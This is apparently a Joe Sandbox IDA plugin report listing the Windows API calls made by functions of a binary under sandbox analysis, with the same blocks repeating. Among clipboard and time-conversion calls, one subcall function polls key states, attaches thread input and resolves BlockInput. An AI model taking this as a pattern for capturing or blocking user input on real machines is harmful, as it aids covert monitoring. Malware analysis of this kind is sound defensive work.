Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425B8B, Relevance: 9.2, APIs: 6, Instructions: 170time

APIs

Part of subcall function 0043B350: _strncpy.LIBCMT ref: 0043B36C
Part of subcall function 0043B350: __ultow.LIBCMT ref: 0043B458
Part of subcall function 0043B350: __ultow.LIBCMT ref: 0043B5BB

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427EEB, Relevance: 9.2, APIs: 6, Instructions: 170time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427C1C, Relevance: 9.2, APIs: 6, Instructions: 170time

APIs

Part of subcall function 0045A230: SetWindowTextA.USER32(?,?), ref: 0045A6D0
Part of subcall function 0045A230: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045A75C
Part of subcall function 0045A230: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045A786
Part of subcall function 0045A230: SetMenu.USER32(?,00000000), ref: 0045A7DE
Part of subcall function 0045A230: ShowWindow.USER32(?,00000006), ref: 0045A853
Part of subcall function 0045A230: ShowWindow.USER32(?,00000003), ref: 0045A864
Part of subcall function 0045A230: ShowWindow.USER32(?,00000009), ref: 0045A875

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426F41, Relevance: 9.2, APIs: 6, Instructions: 170time

APIs

Part of subcall function 0043FF90: GetLastError.KERNEL32 ref: 004401BB
Part of subcall function 0043FF90: GetLastError.KERNEL32(?,?,?,?,004987E9,00426F58,?,004987E9,004987E9,?), ref: 00440222

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004265AA, Relevance: 9.2, APIs: 6, Instructions: 170time

APIs

Part of subcall function 00435B50: SetWindowTextA.USER32(00000000,?), ref: 00435B65

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425D28, Relevance: 9.2, APIs: 6, Instructions: 170time

APIs

Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040D510
Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D5C2
Part of subcall function 0040D4E0: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 0040D5F8
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D618
Part of subcall function 0040D4E0: GetCurrentThreadId.KERNEL32 ref: 0040D64F
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040D688
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040D696
Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040D6F2
Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040D6FF
Part of subcall function 0040D4E0: GetKeyboardLayout.USER32(00000000), ref: 0040D708
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D757
Part of subcall function 0040D4E0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040D88C
Part of subcall function 0040D4E0: GetProcAddress.KERNEL32(00000000), ref: 0040D893
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D8E1
Part of subcall function 0040D4E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040D906
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D930
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA37
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA4B
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA84
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DB33
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DBA2
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DBBC
Part of subcall function 0040D4E0: PostMessageA.USER32(?,00000102,?,00000000), ref: 0040DD0A
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A0), ref: 0040DDA2
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A1), ref: 0040DDB5
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A2), ref: 0040DDC9
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A3), ref: 0040DDDD
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A4), ref: 0040DDF1
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A5), ref: 0040DE05
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040DE16
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040DE27
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040DEC9
Part of subcall function 0040D4E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DEEE
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040DF18
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DF44
Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DFC0
Part of subcall function 0040D4E0: PostMessageW.USER32(00000000,00000102,?,00000000), ref: 0040DFF1
Part of subcall function 0040D4E0: __itow.LIBCMT ref: 0040E021
Part of subcall function 0040D4E0: PostMessageA.USER32(?,00000102,00000000,00000000), ref: 0040E216
Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040E31E
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A0), ref: 0040E38C
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A1), ref: 0040E39F
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A2), ref: 0040E3B3
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A3), ref: 0040E3C7
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A4), ref: 0040E3DB
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A5), ref: 0040E3EF
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040E400
Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040E411
Part of subcall function 0040D4E0: GetKeyState.USER32(00000014), ref: 0040E4B1
Part of subcall function 0040D4E0: GetKeyState.USER32(00000014), ref: 0040E4B9
Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040E4ED
Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000), ref: 0040E4F4
Part of subcall function 0040D4E0: AttachThreadInput.USER32(00000E10,?,00000000), ref: 0040E529
Part of subcall function 0040D4E0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040E552
Part of subcall function 0040D4E0: GetProcAddress.KERNEL32(00000000), ref: 0040E559
Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040E57E
Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000), ref: 0040E585

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427C6F, Relevance: 9.2, APIs: 6, Instructions: 170time

APIs

Part of subcall function 0045BAA0: GetWindowRect.USER32(00000000,?), ref: 0045BC1F
Part of subcall function 0045BAA0: ScreenToClient.USER32(?,?), ref: 0045BC3E
Part of subcall function 0045BAA0: MulDiv.KERNEL32(?,00000060,00000060), ref: 0045BC9F
Part of subcall function 0045BAA0: MulDiv.KERNEL32(?,00000060,00000060), ref: 0045BD03
Part of subcall function 0045BAA0: MulDiv.KERNEL32(?,00000060,00000060), ref: 0045BD6B
Part of subcall function 0045BAA0: MulDiv.KERNEL32(?,00000060,00000060), ref: 0045BDD6
Part of subcall function 0045BAA0: IsWindowEnabled.USER32(00000000), ref: 0045BDF5
Part of subcall function 0045BAA0: IsWindowVisible.USER32 ref: 0045BE1E
Part of subcall function 0045BAA0: GetFocus.USER32 ref: 0045BE5A
Part of subcall function 0045BAA0: GetDlgCtrlID.USER32 ref: 0045BE83
Part of subcall function 0045BAA0: GetClassNameA.USER32(?,?,000000FC), ref: 0045BEC6
Part of subcall function 0045BAA0: EnumChildWindows.USER32(?,00434140,?), ref: 0045BEEC

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427332, Relevance: 9.2, APIs: 6, Instructions: 170time

APIs

Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043EE9A
Part of subcall function 0043EE10: __Stoull.NTSTC_LIBCMT ref: 0043EEB5
Part of subcall function 0043EE10: GetFileAttributesA.KERNEL32(?), ref: 0043EF08
Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043EF3D
Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043EF68
Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043EF91
Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043F01E
Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043F099
Part of subcall function 0043EE10: PostMessageA.USER32(000601DA,00000044,00000403,00000000), ref: 0043F22A
Part of subcall function 0043EE10: 75B0A2A9.COMDLG32(?), ref: 0043F256
Part of subcall function 0043EE10: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 0043F295

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

